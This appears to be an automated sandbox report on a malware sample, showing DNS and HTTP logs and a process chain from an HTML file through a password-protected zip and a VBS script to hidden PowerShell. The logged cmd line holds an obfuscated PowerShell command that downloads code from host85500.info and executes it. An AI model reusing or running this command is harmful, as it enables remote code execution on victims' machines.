                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:31.699425936 CET1.1.1.1192.168.2.40x8049No error (0)s4.histats.com149.56.240.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:32.355285883 CET1.1.1.1192.168.2.40x6c0Name error (3)_15322._https.host85500.infononenone65IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:32.370181084 CET1.1.1.1192.168.2.40xf6e8No error (0)host85500.info45.93.9.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:34.812081099 CET1.1.1.1192.168.2.40x68daNo error (0)www.google.com142.250.186.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:34.812093019 CET1.1.1.1192.168.2.40xb77dNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:43.701581955 CET1.1.1.1192.168.2.40xe6d5No error (0)s4.histats.com54.39.156.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:43.701581955 CET1.1.1.1192.168.2.40xe6d5No error (0)s4.histats.com149.56.240.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:43.701581955 CET1.1.1.1192.168.2.40xe6d5No error (0)s4.histats.com149.56.240.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:43.701581955 CET1.1.1.1192.168.2.40xe6d5No error (0)s4.histats.com54.39.128.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:43.701581955 CET1.1.1.1192.168.2.40xe6d5No error (0)s4.histats.com54.39.128.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:43.701581955 CET1.1.1.1192.168.2.40xe6d5No error (0)s4.histats.com149.56.240.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:43.701581955 CET1.1.1.1192.168.2.40xe6d5No error (0)s4.histats.com149.56.240.127A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:43.701581955 CET1.1.1.1192.168.2.40xe6d5No error (0)s4.histats.com158.69.254.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:43.701581955 CET1.1.1.1192.168.2.40xe6d5No error (0)s4.histats.com149.56.240.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:43.701581955 CET1.1.1.1192.168.2.40xe6d5No error (0)s4.histats.com149.56.240.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:43.701581955 CET1.1.1.1192.168.2.40xe6d5No error (0)s4.histats.com149.56.240.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:43.701581955 CET1.1.1.1192.168.2.40xe6d5No error (0)s4.histats.com149.56.240.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:43.701581955 CET1.1.1.1192.168.2.40xe6d5No error (0)s4.histats.com142.4.219.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:46.398881912 CET1.1.1.1192.168.2.40x9226No error (0)host85500.info45.93.9.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:58.704420090 CET1.1.1.1192.168.2.40xe168No error (0)host85500.info45.93.9.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:57:22.688606977 CET1.1.1.1192.168.2.40xca41No error (0)host85500.info45.93.9.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:57:57.213608027 CET1.1.1.1192.168.2.40x6f44No error (0)host85500.info45.93.9.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:58:16.220566988 CET1.1.1.1192.168.2.40xc9c6No error (0)host85500.info45.93.9.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Feb 5, 2025 07:59:02.770487070 CET1.1.1.1192.168.2.40xb44No error (0)host85500.info45.93.9.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            • s4.histats.com
                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            0192.168.2.449734142.4.219.1984434544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2025-02-05 06:56:31 UTC754OUTGET /stats/0.php?4926117&@f16&@g1&@h1&@i1&@vhttps://histats.com/s_opened_TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExNy4wLjAuMCBTYWZhcmkvNTM3LjM2 HTTP/1.1
                                                                                                                                                                                                                                                            Host: s4.histats.com
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                            2025-02-05 06:56:31 UTC135INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Wed, 05 Feb 2025 06:56:31 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                            Content-Length: 376
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            2025-02-05 06:56:31 UTC376INData Raw: 5f 48 53 54 5f 63 6e 74 76 61 6c 3d 22 49 6e 69 74 69 61 6c 69 7a 69 6e 67 2e 2e 22 3b 63 68 66 68 28 5f 48 53 54 5f 63 6e 74 76 61 6c 29 3b 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 62 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 62 2e 73 72 63 3d 22 2f 2f 65 2e 64 74 73 63 6f 75 74 2e 63 6f 6d 2f 65 2f 3f 76 3d 31 61 26 70 69 64 3d 35 32 30 30 26 73 69 74 65 3d 31 26 6c 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 2b 22 26 6a 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 29 3b 0a 62 2e 61 73 79 6e 63 3d 22 61 73 79 6e 63 22
                                                                                                                                                                                                                                                            Data Ascii: _HST_cntval="Initializing..";chfh(_HST_cntval);;!function(){try{var b=document.createElement("script");b.src="//e.dtscout.com/e/?v=1a&pid=5200&site=1&l="+encodeURIComponent(window.location.href)+"&j="+encodeURIComponent(document.referrer);b.async="async"


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1192.168.2.44973954.39.156.324434544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2025-02-05 06:56:32 UTC554OUTGET /stats/0.php?4926117&@f16&@g1&@h1&@i1&@vhttps://histats.com/s_opened_TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExNy4wLjAuMCBTYWZhcmkvNTM3LjM2 HTTP/1.1
                                                                                                                                                                                                                                                            Host: s4.histats.com
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                            2025-02-05 06:56:32 UTC135INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Wed, 05 Feb 2025 06:56:32 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                            Content-Length: 376
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            2025-02-05 06:56:32 UTC376INData Raw: 5f 48 53 54 5f 63 6e 74 76 61 6c 3d 22 49 6e 69 74 69 61 6c 69 7a 69 6e 67 2e 2e 22 3b 63 68 66 68 28 5f 48 53 54 5f 63 6e 74 76 61 6c 29 3b 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 62 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 62 2e 73 72 63 3d 22 2f 2f 65 2e 64 74 73 63 6f 75 74 2e 63 6f 6d 2f 65 2f 3f 76 3d 31 61 26 70 69 64 3d 35 32 30 30 26 73 69 74 65 3d 31 26 6c 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 2b 22 26 6a 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 29 3b 0a 62 2e 61 73 79 6e 63 3d 22 61 73 79 6e 63 22
                                                                                                                                                                                                                                                            Data Ascii: _HST_cntval="Initializing..";chfh(_HST_cntval);;!function(){try{var b=document.createElement("script");b.src="//e.dtscout.com/e/?v=1a&pid=5200&site=1&l="+encodeURIComponent(window.location.href)+"&j="+encodeURIComponent(document.referrer);b.async="async"


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2192.168.2.44974854.39.156.324436884C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2025-02-05 06:56:44 UTC365OUTGET /stats/0.php?4926118&@f16&@g1&@h1&@i1&@vhttps://histats.com/d_opened HTTP/1.1
                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                            Accept-Language: en-ch
                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                                                            Host: s4.histats.com
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            2025-02-05 06:56:44 UTC135INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Wed, 05 Feb 2025 06:56:44 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                            Content-Length: 376
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            2025-02-05 06:56:44 UTC376INData Raw: 5f 48 53 54 5f 63 6e 74 76 61 6c 3d 22 49 6e 69 74 69 61 6c 69 7a 69 6e 67 2e 2e 22 3b 63 68 66 68 28 5f 48 53 54 5f 63 6e 74 76 61 6c 29 3b 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 62 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 62 2e 73 72 63 3d 22 2f 2f 65 2e 64 74 73 63 6f 75 74 2e 63 6f 6d 2f 65 2f 3f 76 3d 31 61 26 70 69 64 3d 35 32 30 30 26 73 69 74 65 3d 31 26 6c 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 2b 22 26 6a 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 29 3b 0a 62 2e 61 73 79 6e 63 3d 22 61 73 79 6e 63 22
                                                                                                                                                                                                                                                            Data Ascii: _HST_cntval="Initializing..";chfh(_HST_cntval);;!function(){try{var b=document.createElement("script");b.src="//e.dtscout.com/e/?v=1a&pid=5200&site=1&l="+encodeURIComponent(window.location.href)+"&j="+encodeURIComponent(document.referrer);b.async="async"


                                                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                                                            Start time:01:56:25
                                                                                                                                                                                                                                                            Start date:05/02/2025
                                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\CfF7MWq7aG.html"
                                                                                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                                                                            Start time:01:56:29
                                                                                                                                                                                                                                                            Start date:05/02/2025
                                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1836,i,5843688646892688928,17905010364784798591,262144 /prefetch:8
                                                                                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                                                                            Start time:01:56:35
                                                                                                                                                                                                                                                            Start date:05/02/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\unarchiver.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\CfF7MWq7aG.zip"
                                                                                                                                                                                                                                                            Imagebase:0x500000
                                                                                                                                                                                                                                                            File size:12'800 bytes
                                                                                                                                                                                                                                                            MD5 hash:16FF3CC6CC330A08EED70CBC1D35F5D2
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                            Target ID:4
                                                                                                                                                                                                                                                            Start time:01:56:35
                                                                                                                                                                                                                                                            Start date:05/02/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\7za.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p" "C:\Users\user\Downloads\CfF7MWq7aG.zip"
                                                                                                                                                                                                                                                            Imagebase:0x280000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:77E556CDFDC5C592F5C46DB4127C6F4C
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                                                                                            Start time:01:56:35
                                                                                                                                                                                                                                                            Start date:05/02/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:6
                                                                                                                                                                                                                                                            Start time:01:56:36
                                                                                                                                                                                                                                                            Start date:05/02/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs"
                                                                                                                                                                                                                                                            Imagebase:0x240000
                                                                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:false
                                                                                                                                                                                                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                                                                                                                                                                                            Target ID:7
                                                                                                                                                                                                                                                            Start time:01:56:36
                                                                                                                                                                                                                                                            Start date:05/02/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                            Target ID:8
                                                                                                                                                                                                                                                            Start time:01:56:36
                                                                                                                                                                                                                                                            Start date:05/02/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs"
                                                                                                                                                                                                                                                            Imagebase:0x220000
                                                                                                                                                                                                                                                            File size:147'456 bytes
                                                                                                                                                                                                                                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:false
                                                                                                                                                                                                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                                                                                            Start time:01:56:43
                                                                                                                                                                                                                                                            Start date:05/02/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /C "echo $($KSJQTmC = $('{5}{4}{1}' -f $('uxhxeilT'.ToCharArray())); $((182,156,202,232,92,166,202,228,236,210,198,202,160,222,210,220,232,154,194,220,194,206,202,228,186,116,116,166,202,228,236,202,228,134,202,228,232,210,204,210,198,194,232,202,172,194,216,210,200,194,232,210,222,220,134,194,216,216,196,194,198,214,64,122,64,246,72,232,228,234,202,250,118,64,72,240,172,140,208,180,64,122,64,182,166,242,230,232,202,218,92,156,202,232,92,144,232,232,224,174,202,196,164,202,226,234,202,230,232,186,116,116,134,228,202,194,232,202,80,78,208,232,232,224,230,116,94,94,208,222,230,232,112,106,106,96,96,92,210,220,204,222,116,98,106,102,100,100,94,238,202,196,98,92,224,208,224,78,82,118,64,72,240,172,140,208,180,92,168,210,218,202,222,234,232,64,122,64,102,96,96,96,96,96,118,64,72,80,182,166,242,230,232,202,218,92,146,222,92,166,232,228,202,194,218,164,202,194,200,202,228,186,80,72,240,172,140,208,180,92,142,202,232,164,202,230,224,222,220,230,202,80,82,92,142,202,232,164,202,230,224,222,220,230,202,166,232,228,202,194,218,80,82,82,82,92,164,202,194,200,168,222,138,220,200,80,82,64,248,64,146,138,176)^^^|%{[char]($_/2)})-join'') ^^^| ^^^&($KSJQTmC) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"
                                                                                                                                                                                                                                                            Imagebase:0x240000
                                                                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:11
                                                                                                                                                                                                                                                            Start time:01:56:43
                                                                                                                                                                                                                                                            Start date:05/02/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:12
                                                                                                                                                                                                                                                            Start time:01:56:44
                                                                                                                                                                                                                                                            Start date:05/02/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo $($KSJQTmC = $('{5}{4}{1}' -f $('uxhxeilT'.ToCharArray())); $((182,156,202,232,92,166,202,228,236,210,198,202,160,222,210,220,232,154,194,220,194,206,202,228,186,116,116,166,202,228,236,202,228,134,202,228,232,210,204,210,198,194,232,202,172,194,216,210,200,194,232,210,222,220,134,194,216,216,196,194,198,214,64,122,64,246,72,232,228,234,202,250,118,64,72,240,172,140,208,180,64,122,64,182,166,242,230,232,202,218,92,156,202,232,92,144,232,232,224,174,202,196,164,202,226,234,202,230,232,186,116,116,134,228,202,194,232,202,80,78,208,232,232,224,230,116,94,94,208,222,230,232,112,106,106,96,96,92,210,220,204,222,116,98,106,102,100,100,94,238,202,196,98,92,224,208,224,78,82,118,64,72,240,172,140,208,180,92,168,210,218,202,222,234,232,64,122,64,102,96,96,96,96,96,118,64,72,80,182,166,242,230,232,202,218,92,146,222,92,166,232,228,202,194,218,164,202,194,200,202,228,186,80,72,240,172,140,208,180,92,142,202,232,164,202,230,224,222,220,230,202,80,82,92,142,202,232,164,202,230,224,222,220,230,202,166,232,228,202,194,218,80,82,82,82,92,164,202,194,200,168,222,138,220,200,80,82,64,248,64,146,138,176)^|%{[char]($_/2)})-join'') ^| ^&($KSJQTmC) "
                                                                                                                                                                                                                                                            Imagebase:0x240000
                                                                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                                                                                            Start time:01:56:44
                                                                                                                                                                                                                                                            Start date:05/02/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -
                                                                                                                                                                                                                                                            Imagebase:0xec0000
                                                                                                                                                                                                                                                            File size:433'152 bytes
                                                                                                                                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true
                                                                                                                                                                                                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                                            Execution Coverage

                                                                                                                                                                                                                                                            Dynamic/Packed Code Coverage

                                                                                                                                                                                                                                                            Signature Coverage

                                                                                                                                                                                                                                                            Execution Coverage:23.3%
                                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                            Signature Coverage:5.3%
                                                                                                                                                                                                                                                            Total number of Nodes:76
                                                                                                                                                                                                                                                            Total number of Limit Nodes:4
                                                                                                                                                                                                                                                            Show Legend
                                                                                                                                                                                                                                                            Hide Nodes/Edges
